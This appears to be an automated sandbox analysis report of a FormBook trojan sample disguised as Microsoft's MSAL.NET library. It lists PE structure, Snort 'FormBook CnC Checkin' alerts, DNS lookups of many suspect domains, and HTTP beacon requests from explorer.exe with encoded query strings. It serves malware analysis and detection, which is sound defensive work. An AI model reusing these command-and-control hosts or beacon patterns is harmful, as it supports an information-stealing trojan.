                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2e865c0x4a.text
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2ea0000x95c.rsrc
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2ec0000xc.reloc
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x2e86a60x54.text
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                      Sections

                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                      .text0x20000x2e67990x2e6800unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .rsrc0x2ea0000x95c0xa00False0.3390625data3.28207332995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .reloc0x2ec0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                      Resources

                                                                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                      RT_VERSION0x2ea0580x904data

                                                                                                                                                                                                      Imports

                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                                                                                                      Version Infos

                                                                                                                                                                                                      DescriptionData
                                                                                                                                                                                                      Translation0x0000 0x04b0
                                                                                                                                                                                                      LegalCopyright Microsoft Corporation. All rights reserved.
                                                                                                                                                                                                      Assembly Version4.3.0.0
                                                                                                                                                                                                      InternalNameMicrosoft.Identity.Client.dll
                                                                                                                                                                                                      FileVersion4.3.0.0
                                                                                                                                                                                                      CompanyNameMicrosoft Corporation
                                                                                                                                                                                                      Comments This package contains the binaries of the Microsoft Authentication Library for .NET (MSAL.NET). MSAL.NET makes it easy to obtain tokens from the Microsoft identity platform for developers (formally Azure AD v2.0) signing-in users with work & school accounts, Microsoft personal accounts and social identities Azure AD B2C. These tokens again access to Microsoft Cloud API and any other API secured by the Microsoft identity platform. This version supports adding authentication functionality to your .NET based client on Windows desktop (.NET 4.5+), UWP, .NET Core, Xamarin iOS and Xamarin Android.
                                                                                                                                                                                                      ProductNameMicrosoft Authentication Library
                                                                                                                                                                                                      ProductVersion4.3.0+65deb83115a125abe7523f99f3c9df4bb166ece1
                                                                                                                                                                                                      FileDescriptionMicrosoft.Identity.Client
                                                                                                                                                                                                      OriginalFilenameMicrosoft.Identity.Client.dll

                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      192.168.2.3185.53.179.9249783802031449 05/19/22-14:10:39.499329TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.3185.53.179.92
                                                                                                                                                                                                      192.168.2.323.227.38.7449799802031412 05/19/22-14:10:44.609733TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979980192.168.2.323.227.38.74
                                                                                                                                                                                                      192.168.2.3185.53.179.9249783802031412 05/19/22-14:10:39.499329TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.3185.53.179.92
                                                                                                                                                                                                      192.168.2.323.227.38.7449799802031449 05/19/22-14:10:44.609733TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979980192.168.2.323.227.38.74
                                                                                                                                                                                                      192.168.2.3185.53.179.9249783802031453 05/19/22-14:10:39.499329TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.3185.53.179.92
                                                                                                                                                                                                      192.168.2.323.227.38.7449799802031453 05/19/22-14:10:44.609733TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979980192.168.2.323.227.38.74

                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      May 19, 2022 14:10:28.782463074 CEST4977580192.168.2.3154.204.236.66
                                                                                                                                                                                                      May 19, 2022 14:10:29.062159061 CEST8049775154.204.236.66192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:29.062365055 CEST4977580192.168.2.3154.204.236.66
                                                                                                                                                                                                      May 19, 2022 14:10:29.062990904 CEST4977580192.168.2.3154.204.236.66
                                                                                                                                                                                                      May 19, 2022 14:10:29.343488932 CEST8049775154.204.236.66192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:29.345930099 CEST8049775154.204.236.66192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:29.345962048 CEST8049775154.204.236.66192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:29.346107006 CEST4977580192.168.2.3154.204.236.66
                                                                                                                                                                                                      May 19, 2022 14:10:29.346165895 CEST4977580192.168.2.3154.204.236.66
                                                                                                                                                                                                      May 19, 2022 14:10:29.349678993 CEST8049775154.204.236.66192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:29.349765062 CEST4977580192.168.2.3154.204.236.66
                                                                                                                                                                                                      May 19, 2022 14:10:29.558906078 CEST8049775154.204.236.66192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:29.559026957 CEST4977580192.168.2.3154.204.236.66
                                                                                                                                                                                                      May 19, 2022 14:10:29.627492905 CEST8049775154.204.236.66192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:39.465945959 CEST4978380192.168.2.3185.53.179.92
                                                                                                                                                                                                      May 19, 2022 14:10:39.482575893 CEST8049783185.53.179.92192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:39.482665062 CEST4978380192.168.2.3185.53.179.92
                                                                                                                                                                                                      May 19, 2022 14:10:39.499191999 CEST8049783185.53.179.92192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:39.499329090 CEST4978380192.168.2.3185.53.179.92
                                                                                                                                                                                                      May 19, 2022 14:10:39.515939951 CEST8049783185.53.179.92192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:39.515968084 CEST8049783185.53.179.92192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:39.515985966 CEST8049783185.53.179.92192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:39.516201973 CEST4978380192.168.2.3185.53.179.92
                                                                                                                                                                                                      May 19, 2022 14:10:39.516236067 CEST4978380192.168.2.3185.53.179.92
                                                                                                                                                                                                      May 19, 2022 14:10:39.532759905 CEST8049783185.53.179.92192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:44.592505932 CEST4979980192.168.2.323.227.38.74
                                                                                                                                                                                                      May 19, 2022 14:10:44.609462976 CEST804979923.227.38.74192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:44.609708071 CEST4979980192.168.2.323.227.38.74
                                                                                                                                                                                                      May 19, 2022 14:10:44.609733105 CEST4979980192.168.2.323.227.38.74
                                                                                                                                                                                                      May 19, 2022 14:10:44.626600981 CEST804979923.227.38.74192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:44.670866013 CEST804979923.227.38.74192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:44.670892954 CEST804979923.227.38.74192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:44.670909882 CEST804979923.227.38.74192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:44.670927048 CEST804979923.227.38.74192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:44.670941114 CEST804979923.227.38.74192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:44.670953989 CEST804979923.227.38.74192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:44.670965910 CEST804979923.227.38.74192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:44.671015024 CEST4979980192.168.2.323.227.38.74
                                                                                                                                                                                                      May 19, 2022 14:10:44.671138048 CEST4979980192.168.2.323.227.38.74
                                                                                                                                                                                                      May 19, 2022 14:10:44.671411991 CEST4979980192.168.2.323.227.38.74
                                                                                                                                                                                                      May 19, 2022 14:10:49.794996977 CEST4981880192.168.2.3162.241.253.231
                                                                                                                                                                                                      May 19, 2022 14:10:49.939361095 CEST8049818162.241.253.231192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:49.939461946 CEST4981880192.168.2.3162.241.253.231
                                                                                                                                                                                                      May 19, 2022 14:10:49.939589024 CEST4981880192.168.2.3162.241.253.231
                                                                                                                                                                                                      May 19, 2022 14:10:50.086446047 CEST8049818162.241.253.231192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:50.098887920 CEST8049818162.241.253.231192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:50.098931074 CEST8049818162.241.253.231192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:50.099102020 CEST4981880192.168.2.3162.241.253.231
                                                                                                                                                                                                      May 19, 2022 14:10:50.099179983 CEST4981880192.168.2.3162.241.253.231
                                                                                                                                                                                                      May 19, 2022 14:10:50.246016979 CEST8049818162.241.253.231192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:55.198827982 CEST4982780192.168.2.3171.22.26.13
                                                                                                                                                                                                      May 19, 2022 14:10:55.300360918 CEST8049827171.22.26.13192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:55.300465107 CEST4982780192.168.2.3171.22.26.13
                                                                                                                                                                                                      May 19, 2022 14:10:55.300599098 CEST4982780192.168.2.3171.22.26.13
                                                                                                                                                                                                      May 19, 2022 14:10:55.402215004 CEST8049827171.22.26.13192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:55.809591055 CEST4982780192.168.2.3171.22.26.13
                                                                                                                                                                                                      May 19, 2022 14:10:55.949675083 CEST8049827171.22.26.13192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:57.439950943 CEST8049827171.22.26.13192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:57.439977884 CEST8049827171.22.26.13192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:57.440169096 CEST4982780192.168.2.3171.22.26.13
                                                                                                                                                                                                      May 19, 2022 14:10:57.440193892 CEST4982780192.168.2.3171.22.26.13

                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      May 19, 2022 14:10:23.415923119 CEST5281053192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:10:23.445700884 CEST53528108.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:28.605317116 CEST5077853192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:10:28.776738882 CEST53507788.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:34.354455948 CEST5515153192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:10:34.376116991 CEST53551518.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:39.426070929 CEST5381653192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:10:39.464669943 CEST53538168.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:44.541327953 CEST5151853192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:10:44.572144985 CEST53515188.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:49.683912039 CEST6494153192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:10:49.793703079 CEST53649418.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:10:55.156276941 CEST6275653192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:10:55.197828054 CEST53627568.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:11:06.683423996 CEST6254753192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:11:06.713597059 CEST53625478.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:11:12.074141979 CEST5782953192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:11:12.096645117 CEST53578298.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:11:17.105715990 CEST6332653192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:11:17.136986971 CEST53633268.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:11:24.281641006 CEST4923053192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:11:24.665604115 CEST53492308.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:11:24.669790983 CEST5744253192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:11:25.056555986 CEST53574428.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:11:25.059998989 CEST5155753192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:11:25.300905943 CEST53515578.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:11:30.307904959 CEST6533453192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:11:30.331687927 CEST53653348.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:11:35.432998896 CEST5248753192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:11:35.455930948 CEST53524878.8.8.8192.168.2.3
                                                                                                                                                                                                      May 19, 2022 14:11:40.590653896 CEST5165853192.168.2.38.8.8.8
                                                                                                                                                                                                      May 19, 2022 14:11:40.625366926 CEST53516588.8.8.8192.168.2.3

                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                      May 19, 2022 14:10:23.415923119 CEST192.168.2.38.8.8.80xcc75Standard query (0)www.wifitest.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:28.605317116 CEST192.168.2.38.8.8.80xfd44Standard query (0)www.rkhubs.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:34.354455948 CEST192.168.2.38.8.8.80xa5afStandard query (0)www.floridasunbreaks.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:39.426070929 CEST192.168.2.38.8.8.80x4414Standard query (0)www.bathingsuitsshoppingus.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:44.541327953 CEST192.168.2.38.8.8.80x8a71Standard query (0)www.cthomassolutions.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:49.683912039 CEST192.168.2.38.8.8.80x1fe2Standard query (0)www.paulstilingroup.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:55.156276941 CEST192.168.2.38.8.8.80x85dcStandard query (0)www.ponponshoes.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:06.683423996 CEST192.168.2.38.8.8.80x5899Standard query (0)www.fliptheswitch.proA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:12.074141979 CEST192.168.2.38.8.8.80x72f8Standard query (0)www.multimediaroomandboard.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:17.105715990 CEST192.168.2.38.8.8.80x52c4Standard query (0)www.ginas4t.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:24.281641006 CEST192.168.2.38.8.8.80xdde4Standard query (0)www.tempepdf.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:24.669790983 CEST192.168.2.38.8.8.80x3819Standard query (0)www.tempepdf.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:25.059998989 CEST192.168.2.38.8.8.80xca18Standard query (0)www.tempepdf.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:30.307904959 CEST192.168.2.38.8.8.80x8848Standard query (0)www.defipayout.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:35.432998896 CEST192.168.2.38.8.8.80x424bStandard query (0)www.abtys6.onlineA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:40.590653896 CEST192.168.2.38.8.8.80x781fStandard query (0)www.byzbh63.xyzA (IP address)IN (0x0001)

                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                      May 19, 2022 14:10:23.445700884 CEST8.8.8.8192.168.2.30xcc75Name error (3)www.wifitest.infononenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:28.776738882 CEST8.8.8.8192.168.2.30xfd44No error (0)www.rkhubs.com154.204.236.66A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:34.376116991 CEST8.8.8.8192.168.2.30xa5afName error (3)www.floridasunbreaks.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:39.464669943 CEST8.8.8.8192.168.2.30x4414No error (0)www.bathingsuitsshoppingus.com185.53.179.92A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:44.572144985 CEST8.8.8.8192.168.2.30x8a71No error (0)www.cthomassolutions.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:44.572144985 CEST8.8.8.8192.168.2.30x8a71No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:49.793703079 CEST8.8.8.8192.168.2.30x1fe2No error (0)www.paulstilingroup.compaulstilingroup.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:49.793703079 CEST8.8.8.8192.168.2.30x1fe2No error (0)paulstilingroup.com162.241.253.231A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:10:55.197828054 CEST8.8.8.8192.168.2.30x85dcNo error (0)www.ponponshoes.com171.22.26.13A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:06.713597059 CEST8.8.8.8192.168.2.30x5899No error (0)www.fliptheswitch.proparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:06.713597059 CEST8.8.8.8192.168.2.30x5899No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:06.713597059 CEST8.8.8.8192.168.2.30x5899No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:06.713597059 CEST8.8.8.8192.168.2.30x5899No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:06.713597059 CEST8.8.8.8192.168.2.30x5899No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:06.713597059 CEST8.8.8.8192.168.2.30x5899No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:06.713597059 CEST8.8.8.8192.168.2.30x5899No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:06.713597059 CEST8.8.8.8192.168.2.30x5899No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:12.096645117 CEST8.8.8.8192.168.2.30x72f8Name error (3)www.multimediaroomandboard.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:17.136986971 CEST8.8.8.8192.168.2.30x52c4No error (0)www.ginas4t.com45.82.73.217A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:24.665604115 CEST8.8.8.8192.168.2.30xdde4Name error (3)www.tempepdf.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:25.056555986 CEST8.8.8.8192.168.2.30x3819Name error (3)www.tempepdf.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:25.300905943 CEST8.8.8.8192.168.2.30xca18Name error (3)www.tempepdf.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:30.331687927 CEST8.8.8.8192.168.2.30x8848No error (0)www.defipayout.xyz3.64.163.50A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:35.455930948 CEST8.8.8.8192.168.2.30x424bNo error (0)www.abtys6.online188.114.96.10A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:35.455930948 CEST8.8.8.8192.168.2.30x424bNo error (0)www.abtys6.online188.114.97.10A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:40.625366926 CEST8.8.8.8192.168.2.30x781fNo error (0)www.byzbh63.xyzbzps7umy-u.cnamexingzuoy.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:40.625366926 CEST8.8.8.8192.168.2.30x781fNo error (0)bzps7umy-u.cnamexingzuoy.comytc5axd6.n.cnamexingzuoy.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:40.625366926 CEST8.8.8.8192.168.2.30x781fNo error (0)ytc5axd6.n.cnamexingzuoy.com156.251.170.8A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:40.625366926 CEST8.8.8.8192.168.2.30x781fNo error (0)ytc5axd6.n.cnamexingzuoy.com156.251.170.6A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:40.625366926 CEST8.8.8.8192.168.2.30x781fNo error (0)ytc5axd6.n.cnamexingzuoy.com156.251.170.7A (IP address)IN (0x0001)
                                                                                                                                                                                                      May 19, 2022 14:11:40.625366926 CEST8.8.8.8192.168.2.30x781fNo error (0)ytc5axd6.n.cnamexingzuoy.com156.251.170.2A (IP address)IN (0x0001)

                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                      • www.rkhubs.com
                                                                                                                                                                                                      • www.bathingsuitsshoppingus.com
                                                                                                                                                                                                      • www.cthomassolutions.com
                                                                                                                                                                                                      • www.paulstilingroup.com
                                                                                                                                                                                                      • www.ponponshoes.com

                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      0192.168.2.349775154.204.236.6680C:\Windows\explorer.exe
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      May 19, 2022 14:10:29.062990904 CEST9478OUTGET /arh2/?5j1TIdG=96p+z0lbCXEtn8r3kdhvhAjX1ASZK1voQ/JiiDcNf2/dHgDP8ab1TZBAgNzfa8Mh8PSm&ozr=4hLlIp3xzfzHD HTTP/1.1
                                                                                                                                                                                                      Host: www.rkhubs.com
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                      May 19, 2022 14:10:29.345930099 CEST9478INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Thu, 19 May 2022 12:10:29 GMT
                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                      Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                      Data Ascii: 1.0
                                                                                                                                                                                                      May 19, 2022 14:10:29.558906078 CEST9478INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Thu, 19 May 2022 12:10:29 GMT
                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                      Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                      Data Ascii: 1.0


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      1192.168.2.349783185.53.179.9280C:\Windows\explorer.exe
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      May 19, 2022 14:10:39.499329090 CEST9580OUTGET /arh2/?5j1TIdG=K6jUs0mpPBEML/5NzMDHXY6gxTSHaKTmmlbiXWC1vBmmOSfP0HM5UB/sQ7498az1yFs1&ozr=4hLlIp3xzfzHD HTTP/1.1
                                                                                                                                                                                                      Host: www.bathingsuitsshoppingus.com
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                      May 19, 2022 14:10:39.515968084 CEST9580INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Thu, 19 May 2022 12:10:39 GMT
                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                      Content-Length: 146
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      2192.168.2.34979923.227.38.7480C:\Windows\explorer.exe
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      May 19, 2022 14:10:44.609733105 CEST9772OUTGET /arh2/?5j1TIdG=Dn2b2G7G/trQ3SmQOOzvZCyKhxwSo2sXwRlhdoEbpLnK/FZ0l0AAIUO0K0AUyG9Pn804&ozr=4hLlIp3xzfzHD HTTP/1.1
                                                                                                                                                                                                      Host: www.cthomassolutions.com
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                      May 19, 2022 14:10:44.670866013 CEST9774INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                      Date: Thu, 19 May 2022 12:10:44 GMT
                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                      X-Sorting-Hat-PodId: 241
                                                                                                                                                                                                      X-Sorting-Hat-ShopId: 64209715442
                                                                                                                                                                                                      X-Dc: gcp-europe-west1
                                                                                                                                                                                                      X-Request-ID: d945d2e5-05ef-4fd2-83eb-071016fb7061
                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                      X-Download-Options: noopen
                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                      CF-RAY: 70dcbb2cd8636957-FRA
                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
